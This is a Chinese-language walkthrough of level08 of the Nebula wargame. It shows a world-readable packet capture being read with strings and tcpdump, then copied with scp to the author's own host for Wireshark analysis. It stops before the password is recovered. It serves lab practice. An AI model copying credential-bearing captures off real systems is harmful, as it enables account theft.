Nabula writesup level08

About World readable files strike again. Check what that user was up to, and use it to log into flag08 account. To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08. Source code There is no source code available for this level

刚开始打开目录的时候我是懵的，里面只有一个root权限建立的capture.pcap文件。VIM打开看是乱码，用strings capture.pcap隐约能看到几个password的ASCII字符。 Google了一下，发现pcap是wireshark的记录文件后缀，用tcpdump也可以生成和阅读。可是目标环境中没有wireshark，尝试用tcpdump打开文件看看。

$ tcpdump -r capture.pcap > ～/readable.txt

打开一看，全是类似如下格式的报文：

21:23:12.267566 IP 59.233.235.218.39247 > 59.233.235.223.12121: Flags [S], seq 2635601089, win 14600, options [mss 1460,sackOK,TS val 18592800 ecr 0,nop,wscale 7], length 0

21:23:12.267694 IP 59.233.235.223.12121 > 59.233.235.218.39247: Flags [S.], seq 3131636289, ack 2635601090, win 14480, options [mss 1460,sackOK,TS val 46280417 ecr 18592800,nop,wscale 5], length 0

连之前找到的password几个字符都没了，估计是tcpdump显示的信息不完整。于是只能先把东西传出来，用正经的wireshark来读。

$ scp /home/flag08/capture.pcap liuz@192.168.3.2:/home/liuz

大神请受我一拜